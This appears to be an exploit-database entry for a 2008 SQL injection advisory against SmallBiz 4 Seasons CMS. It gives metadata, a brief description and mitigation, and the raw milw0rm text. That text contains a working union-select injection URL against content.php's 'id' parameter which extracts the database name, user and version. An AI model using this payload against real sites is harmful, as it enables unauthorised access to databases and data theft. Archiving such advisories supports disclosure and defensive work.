Powered by SmallBiz 4 Seasons CMS Remote Sql Inj. Vuln.

vendor:

4 Seasons CMS

by:

cO2 [Algeria Security Crew]

8.5

CVSS

HIGH

SQL Injection

CWE

Product Name: 4 Seasons CMS

Affected Version From: SmallBiz 4 Seasons CMS

Affected Version To: SmallBiz 4 Seasons CMS

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Powered by SmallBiz 4 Seasons CMS Remote Sql Inj. Vuln.

A vulnerability in SmallBiz 4 Seasons CMS allows an attacker to execute arbitrary SQL commands via the 'id' parameter in the 'content.php' script.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

###################################################
[~] Powered by SmallBiz 4 Seasons CMS Remote Sql Ä°nj. Vuln.
                                                                                                                
[~] Founder: cO2 [ Algeria Security Crew ]
[~] HomePage: http://www.DZ-Secure.com
[~] Greatz : To all Hackerz from Algeria & All My Friends . . .
[~] Contact: c02@Hotmail.de
[~] Exploit :
http://www.xxx.org/content.php?id=1/**/union/**/select/**/1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9/*
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

# milw0rm.com [2008-04-14]